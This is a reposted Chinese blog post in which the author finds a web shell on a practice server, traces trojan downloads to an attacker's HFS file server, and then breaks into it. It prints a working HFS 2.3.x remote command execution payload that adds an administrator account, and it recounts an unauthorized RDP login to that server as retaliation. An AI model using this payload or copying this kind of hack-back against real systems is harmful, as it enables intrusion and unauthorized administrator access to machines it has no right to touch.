<返回更多

自己的服务器被黑客抓鸡-看我如何反击

2020-03-04    
加入收藏

自己的服务器被黑客抓鸡-看我如何反击

 

 

我与该学员的聊天截图

自己的服务器被黑客抓鸡-看我如何反击

 

脚本黑客的服务器桌面截图

自己的服务器被黑客抓鸡-看我如何反击

 

如何渗透进去的呢

自己的服务器被黑客抓鸡-看我如何反击

 

 

 科普HFS

 

先来科普一下:

 

HFS是什么?

 

HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统

 

如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键

 

即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。

 

 事情原因

 

今天我发现我自己练习用的服务器被别人挂了一句话木马

(我没有修改phpstudy的MySQL数据库默认密码),一定要注意弱口令和及时更改默认密码

 

如图打开主页成这样的了都是些数据库的日志应该是被黑客给搞了

 

(太可怕了),怪自己太疏忽。

 

自己的服务器被黑客抓鸡-看我如何反击

 

我在里面发现了一些奇怪的下载连接,判断了下,应该是下载木马的连接

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

然后我通过浏览器访问了下该地址,发现是一个HFS的程序

自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 


自己的服务器被黑客抓鸡-看我如何反击

 

然后发现上面全是木马exe,可能是脚本小子用来抓肉鸡用的

我记得没错的话。

HFS2.3.X有个远程代码执行的漏洞

 

Payload:

 

http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

 

 反击

 

HFS2.3.X代码执行的利用工具,我从网上下载了一个

自己的服务器被黑客抓鸡-看我如何反击

 

成功执行了命令,添加了一个用户

自己的服务器被黑客抓鸡-看我如何反击

 

然后我直接3389上去看了下

自己的服务器被黑客抓鸡-看我如何反击

 

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

 后续

 

这台服务器的归属运营商,我向客服说明了情况,希望他们处理下该问题

自己的服务器被黑客抓鸡-看我如何反击

 

 

下面是我与网站客服的聊天截图

自己的服务器被黑客抓鸡-看我如何反击

 

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

自己的服务器被黑客抓鸡-看我如何反击

 

 

最后,希望大家不要利用技术来做非法的事情

 

自己的服务器被黑客抓鸡-看我如何反击

 

作者:HACK学习

转载自:https://mp.weixin.qq.com/s/wNm752Nlc498ezQJ7l1dhA

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍最近更新
更多资讯 >>>